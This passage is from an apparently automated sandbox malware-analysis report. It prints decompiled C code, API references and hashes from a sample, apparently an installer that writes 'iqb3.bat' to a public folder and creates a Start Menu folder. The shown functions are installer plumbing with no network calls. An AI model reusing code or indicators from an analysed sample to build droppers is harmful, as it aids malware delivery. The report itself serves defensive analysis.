                                                                      0x10002461
                                                                      0x10002463
                                                                      0x10002464
                                                                      0x10002466
                                                                      0x1000247b
                                                                      0x10002482
                                                                      0x10002488
                                                                      0x1000242d
                                                                      0x1000242e
                                                                      0x10002434
                                                                      0x10002437
                                                                      0x1000243d
                                                                      0x10002443
                                                                      0x10002443
                                                                      0x10002443
                                                                      0x1000242e
                                                                      0x1000242b
                                                                      0x10002428
                                                                      0x10002421
                                                                      0x1000241a
                                                                      0x10002413
                                                                      0x100024da
                                                                      0x100024df
                                                                      0x100024f0
                                                                      0x100024f0
                                                                      0x100024f6
                                                                      0x100024fb
                                                                      0x10002500
                                                                      0x1000250c
                                                                      0x10002511
                                                                      0x00000000
                                                                      0x10002516
                                                                      0x10002502
                                                                      0x10002503
                                                                      0x10002517
                                                                      0x10002517
                                                                      0x10002500
                                                                      0x10002519
                                                                      0x1000251f
                                                                      0x10002523
                                                                      0x10002526
                                                                      0x10002535

                                                                      APIs
                                                                      • wsprintfA.USER32 ref: 1000243D
                                                                      • GlobalAlloc.KERNEL32(00000040,?,?,?,?,00000000,00000001,100017D5,00000000), ref: 10002455
                                                                      • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 10002466
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 1000247B
                                                                      • GlobalFree.KERNEL32 ref: 10002482
                                                                        • Part of subcall function 100012E8: lstrcpyA.KERNEL32(-1000404B,00000000,?,10001199,?,00000000), ref: 10001310
                                                                      • GlobalFree.KERNEL32 ref: 100024F0
                                                                      • GlobalFree.KERNEL32 ref: 10002519
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.757682389.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000002.00000002.757659819.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                      • Associated: 00000002.00000002.757713257.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                      • Associated: 00000002.00000002.757732274.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_10000000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$AllocByteCharFromMultiStringWidelstrcpywsprintf
                                                                      • String ID: {3v@u3v
                                                                      • API String ID: 2278267121-40114749
                                                                      • Opcode ID: ef8d39a89eb95cdffd39ed95cde5a9d48ed42f12edcbc88745b4f86f25811587
                                                                      • Instruction ID: 4c31113825cd6d876adfd950bde12b9626868b5f7bcca2444e77b9607fd07d19
                                                                      • Opcode Fuzzy Hash: ef8d39a89eb95cdffd39ed95cde5a9d48ed42f12edcbc88745b4f86f25811587
                                                                      • Instruction Fuzzy Hash: 7A41AEB150825AEFFB11DFA4CDC8E2B7BECFB442C1B124529FA0182168DB31AD40DB25
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 10002218 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 136memorystringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 91%
                                                                      			E10002218(void* __edx, intOrPtr _a4) {
				signed int _v4;
				CHAR* _t32;
				intOrPtr _t33;
				void* _t34;
				void* _t36;
				void* _t43;
				void** _t49;
				CHAR* _t58;
				void* _t59;
				signed int* _t60;
				void* _t61;
				intOrPtr* _t62;
				CHAR* _t63;
				void* _t73;

				_t59 = __edx;
				_v4 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t62 = (_v4 << 5) + _t9;
					_t32 =  *(_t62 + 0x14);
					if(_t32 == 0) {
						goto L9;
					}
					_t58 = 0x1a;
					if(_t32 == _t58) {
						goto L9;
					}
					if(_t32 != 0xffffffff) {
						if(_t32 <= 0 || _t32 > 0x19) {
							 *(_t62 + 0x14) = _t58;
						} else {
							_t32 = E100012BF(_t32 - 1);
							L10:
						}
						goto L11;
					} else {
						_t32 = E1000123B();
						L11:
						_t63 = _t32;
						_t13 = _t62 + 8; // 0x820
						_t60 = _t13;
						if( *((intOrPtr*)(_t62 + 4)) != 0xffffffff) {
							_t49 = _t60;
						} else {
							_t49 =  *_t60;
						}
						_t33 =  *_t62;
						 *(_t62 + 0x1c) =  *(_t62 + 0x1c) & 0x00000000;
						if(_t33 == 0) {
							 *_t60 =  *_t60 & 0x00000000;
						} else {
							if(_t33 == 1) {
								_t36 = E1000131B(_t63);
								L27:
								 *_t49 = _t36;
								L31:
								_t34 = GlobalFree(_t63);
								if(_v4 == 0) {
									return _t34;
								}
								if(_v4 !=  *((intOrPtr*)(_a4 + 0x814))) {
									_v4 = _v4 + 1;
								} else {
									_v4 = _v4 & 0x00000000;
								}
								continue;
							}
							if(_t33 == 2) {
								 *_t49 = E1000131B(_t63);
								_t49[1] = _t59;
								goto L31;
							}
							_t73 = _t33 - 3;
							if(_t73 == 0) {
								_t36 = E10001224(_t63);
								 *(_t62 + 0x1c) = _t36;
								goto L27;
							}
							if(_t73 > 0) {
								if(_t33 <= 5) {
									_t61 = GlobalAlloc(0x40,  *0x1000405c +  *0x1000405c);
									MultiByteToWideChar(0, 0, _t63,  *0x1000405c, _t61,  *0x1000405c);
									if( *_t62 != 5) {
										 *(_t62 + 0x1c) = _t61;
										 *_t49 = _t61;
									} else {
										_t43 = GlobalAlloc(0x40, 0x10);
										 *(_t62 + 0x1c) = _t43;
										 *_t49 = _t43;
										__imp__CLSIDFromString(_t61, _t43);
										GlobalFree(_t61);
									}
								} else {
									if(_t33 == 6 && lstrlenA(_t63) > 0) {
										 *_t60 = E10002536(E1000131B(_t63));
									}
								}
							}
						}
						goto L31;
					}
					L9:
					_t32 = E10001224(0x10004034);
					goto L10;
				}
			}

















                                                                      0x10002218
                                                                      0x1000222c
                                                                      0x10002230
                                                                      0x1000223b
                                                                      0x1000223b
                                                                      0x10002242
                                                                      0x10002247
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1000224b
                                                                      0x1000224e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002253
                                                                      0x1000225e
                                                                      0x1000226e
                                                                      0x10002265
                                                                      0x10002267
                                                                      0x1000227d
                                                                      0x1000227d
                                                                      0x00000000
                                                                      0x10002255
                                                                      0x10002255
                                                                      0x1000227e
                                                                      0x10002282
                                                                      0x10002284
                                                                      0x10002284
                                                                      0x10002287
                                                                      0x1000228d
                                                                      0x10002289
                                                                      0x10002289
                                                                      0x10002289
                                                                      0x1000228f
                                                                      0x10002291
                                                                      0x10002297
                                                                      0x10002362
                                                                      0x1000229d
                                                                      0x100022a0
                                                                      0x1000235b
                                                                      0x10002347
                                                                      0x10002348
                                                                      0x10002365
                                                                      0x10002366
                                                                      0x10002371
                                                                      0x1000239b
                                                                      0x1000239b
                                                                      0x10002381
                                                                      0x1000238d
                                                                      0x10002383
                                                                      0x10002383
                                                                      0x10002383
                                                                      0x00000000
                                                                      0x10002381
                                                                      0x100022a9
                                                                      0x10002353
                                                                      0x10002355
                                                                      0x00000000
                                                                      0x10002355
                                                                      0x100022af
                                                                      0x100022b2
                                                                      0x1000233f
                                                                      0x10002344
                                                                      0x00000000
                                                                      0x10002344
                                                                      0x100022b8
                                                                      0x100022c1
                                                                      0x100022fd
                                                                      0x1000230c
                                                                      0x10002315
                                                                      0x10002337
                                                                      0x1000233a
                                                                      0x10002317
                                                                      0x1000231b
                                                                      0x10002322
                                                                      0x10002326
                                                                      0x10002328
                                                                      0x1000232f
                                                                      0x1000232f
                                                                      0x100022c3
                                                                      0x100022c6
                                                                      0x100022e8
                                                                      0x100022ea
                                                                      0x100022c6
                                                                      0x100022c1
                                                                      0x100022b8
                                                                      0x00000000
                                                                      0x10002297
                                                                      0x10002273
                                                                      0x10002278
                                                                      0x00000000
                                                                      0x10002278

                                                                      APIs
                                                                      • lstrlenA.KERNEL32(?), ref: 100022CD
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 100022F7
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 1000230C
                                                                      • GlobalAlloc.KERNEL32(00000040,00000010), ref: 1000231B
                                                                      • CLSIDFromString.OLE32(00000000,00000000), ref: 10002328
                                                                      • GlobalFree.KERNEL32 ref: 1000232F
                                                                      • GlobalFree.KERNEL32 ref: 10002366
                                                                        • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012E1,?,100011AB,-000000A0), ref: 10001234
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.757682389.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000002.00000002.757659819.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                      • Associated: 00000002.00000002.757713257.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                      • Associated: 00000002.00000002.757732274.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_10000000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpynlstrlen
                                                                      • String ID: @u3v
                                                                      • API String ID: 3955009414-2775030947
                                                                      • Opcode ID: 69aff648fa357728dc284a58534689404649d34245d0df12f916c92667a5c5b3
                                                                      • Instruction ID: 8b241ec9b16495ad6526e456ecf9fe23ef16db2f5f6b1e36baefbe8d682bcded
                                                                      • Opcode Fuzzy Hash: 69aff648fa357728dc284a58534689404649d34245d0df12f916c92667a5c5b3
                                                                      • Instruction Fuzzy Hash: 2A417C71509301EFF760DF648888B6AB7ECFB443D1F218929F946D6199DB34AA40CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405F49 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00405F49(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004057DB(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405799("*?|<>/\":", _t5))) == 0) {
							E0040592A(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                      0x00405f4b
                                                                      0x00405f53
                                                                      0x00405f67
                                                                      0x00405f67
                                                                      0x00405f6d
                                                                      0x00405f7a
                                                                      0x00405f7a
                                                                      0x00405f7b
                                                                      0x00405f7d
                                                                      0x00405f81
                                                                      0x00405f83
                                                                      0x00405f8c
                                                                      0x00405f8e
                                                                      0x00405fa8
                                                                      0x00405fb0
                                                                      0x00405fb0
                                                                      0x00405fb5
                                                                      0x00405fb7
                                                                      0x00405fb9
                                                                      0x00405fbd
                                                                      0x00405fbe
                                                                      0x00405fc1
                                                                      0x00405fc9
                                                                      0x00405fcb
                                                                      0x00405fcf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405fd5
                                                                      0x00405fda
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405fda
                                                                      0x00405fdf

                                                                      APIs
                                                                      • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\Public\iqb3.bat" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,746AFA90,004033C9), ref: 00405FA1
                                                                      • CharNextA.USER32(?,?,?,00000000), ref: 00405FAE
                                                                      • CharNextA.USER32(?,"C:\Users\Public\iqb3.bat" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,746AFA90,004033C9), ref: 00405FB3
                                                                      • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,746AFA90,004033C9), ref: 00405FC3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Next$Prev
                                                                      • String ID: "C:\Users\Public\iqb3.bat" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 589700163-507191549
                                                                      • Opcode ID: 629f8b76d7fa33355aab091ca9466ab0ab0c1990dabb568f1c5d9d4edaa7ed44
                                                                      • Instruction ID: 52ce86beafc523711f1768644b20335aaf79eeea50abe94daadfaeac939761d3
                                                                      • Opcode Fuzzy Hash: 629f8b76d7fa33355aab091ca9466ab0ab0c1990dabb568f1c5d9d4edaa7ed44
                                                                      • Instruction Fuzzy Hash: C811C851808B97A9F73206340C44B77BF99CB5B760F18047BE9C4722C2D67C5C42DA6D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00404033 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00404033(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                      0x00404045
                                                                      0x004040d9
                                                                      0x00000000
                                                                      0x004040d9
                                                                      0x00404056
                                                                      0x0040405a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404060
                                                                      0x00404069
                                                                      0x0040406c
                                                                      0x0040406c
                                                                      0x00404072
                                                                      0x00404078
                                                                      0x00404078
                                                                      0x00404084
                                                                      0x0040408a
                                                                      0x00404091
                                                                      0x00404094
                                                                      0x00404097
                                                                      0x00404099
                                                                      0x00404099
                                                                      0x004040a1
                                                                      0x004040a7
                                                                      0x004040a7
                                                                      0x004040b1
                                                                      0x004040b6
                                                                      0x004040b9
                                                                      0x004040be
                                                                      0x004040c1
                                                                      0x004040c1
                                                                      0x004040d1
                                                                      0x004040d1
                                                                      0x00000000

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                      • String ID:
                                                                      • API String ID: 2320649405-0
                                                                      • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                                      • Instruction ID: 9508cbdce8052bc2bd730cf0eefd2a198c0b18875b65dcd903ac07b372545bec
                                                                      • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                                      • Instruction Fuzzy Hash: 482184B19047449BCB319F78DD08B5BBBF8AF41714F048A29EA96F22E1C738E944CB55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402683 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 93%
                                                                      			E00402683(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029FD(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004057DB(_t52) == 0) {
					E004029FD(0xffffffed);
				}
				E0040594A(_t52);
				_t27 = E0040596F(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x4236f4;
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004031CC(_t47);
						E004031B6(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402F1F(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E0040592A( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402F1F(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                                                      0x00402683
                                                                      0x00402685
                                                                      0x00402691
                                                                      0x00402694
                                                                      0x0040269e
                                                                      0x004026a2
                                                                      0x004026a2
                                                                      0x004026a8
                                                                      0x004026b5
                                                                      0x004026bd
                                                                      0x004026c0
                                                                      0x004026c6
                                                                      0x004026d4
                                                                      0x004026d9
                                                                      0x004026dd
                                                                      0x004026e0
                                                                      0x004026e9
                                                                      0x004026f5
                                                                      0x004026f9
                                                                      0x004026fc
                                                                      0x00402706
                                                                      0x00402725
                                                                      0x0040270d
                                                                      0x00402712
                                                                      0x0040271a
                                                                      0x0040271d
                                                                      0x00402722
                                                                      0x00402722
                                                                      0x0040272c
                                                                      0x0040272c
                                                                      0x0040273e
                                                                      0x00402745
                                                                      0x00402757
                                                                      0x00402757
                                                                      0x0040275d
                                                                      0x0040275d
                                                                      0x00402768
                                                                      0x00402769
                                                                      0x0040276d
                                                                      0x00402771
                                                                      0x00402777
                                                                      0x00402777
                                                                      0x0040277e
                                                                      0x0040217c
                                                                      0x00402895
                                                                      0x004028a1

                                                                      APIs
                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D7
                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026F3
                                                                      • GlobalFree.KERNEL32 ref: 0040272C
                                                                      • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 0040273E
                                                                      • GlobalFree.KERNEL32 ref: 00402745
                                                                      • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 0040275D
                                                                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 00402771
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                      • String ID:
                                                                      • API String ID: 3294113728-0
                                                                      • Opcode ID: 82a50f43b36e1856efc9a971e964058a02736900cd8a254f9467012cb7b255d0
                                                                      • Instruction ID: 503fd3c95f490675627f5e02168e5e633d1b488668870af047a7021cc1d79fd2
                                                                      • Opcode Fuzzy Hash: 82a50f43b36e1856efc9a971e964058a02736900cd8a254f9467012cb7b255d0
                                                                      • Instruction Fuzzy Hash: BF318B71C00128BBCF216FA5CD89DAE7E79EF09364F10423AF524772E1C6795D419BA8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402BDA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00402BDA(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x416894; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x416894 = 0;
					return _t15;
				}
				__eflags =  *0x416894; // 0x0
				if(__eflags != 0) {
					return E00406042(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x4236ec;
				if(_t6 >  *0x4236ec) {
					__eflags =  *0x4236e8;
					if( *0x4236e8 == 0) {
						_t7 = CreateDialogParamA( *0x4236e0, 0x6f, 0, E00402B42, 0);
						 *0x416894 = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x423794 & 0x00000001;
					if(( *0x423794 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BBE());
						return E00404FC9(0,  &_v68);
					}
				}
				return _t6;
			}







                                                                      0x00402be6
                                                                      0x00402be8
                                                                      0x00402bef
                                                                      0x00402bf2
                                                                      0x00402bf2
                                                                      0x00402bf8
                                                                      0x00000000
                                                                      0x00402bf8
                                                                      0x00402c00
                                                                      0x00402c06
                                                                      0x00000000
                                                                      0x00402c09
                                                                      0x00402c10
                                                                      0x00402c16
                                                                      0x00402c1c
                                                                      0x00402c1e
                                                                      0x00402c24
                                                                      0x00402c62
                                                                      0x00402c6b
                                                                      0x00000000
                                                                      0x00402c70
                                                                      0x00402c26
                                                                      0x00402c2d
                                                                      0x00402c3e
                                                                      0x00000000
                                                                      0x00402c4c
                                                                      0x00402c2d
                                                                      0x00402c78

                                                                      APIs
                                                                      • DestroyWindow.USER32(00000000,00000000), ref: 00402BF2
                                                                      • GetTickCount.KERNEL32 ref: 00402C10
                                                                      • wsprintfA.USER32 ref: 00402C3E
                                                                        • Part of subcall function 00404FC9: lstrlenA.KERNEL32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405002
                                                                        • Part of subcall function 00404FC9: lstrlenA.KERNEL32(00402C51,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405012
                                                                        • Part of subcall function 00404FC9: lstrcatA.KERNEL32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00402C51,00402C51,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00000000,00000000), ref: 00405025
                                                                        • Part of subcall function 00404FC9: SetWindowTextA.USER32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade), ref: 00405037
                                                                        • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505D
                                                                        • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405077
                                                                        • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405085
                                                                      • CreateDialogParamA.USER32(0000006F,00000000,00402B42,00000000), ref: 00402C62
                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402C70
                                                                        • Part of subcall function 00402BBE: MulDiv.KERNEL32(00023753,00000064,0001BE16), ref: 00402BD3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                      • String ID: ... %d%%
                                                                      • API String ID: 722711167-2449383134
                                                                      • Opcode ID: 74fb76eeeede5a40a20a2361ef673ad81c0513ff9195b193d02cf5d9451a49b8
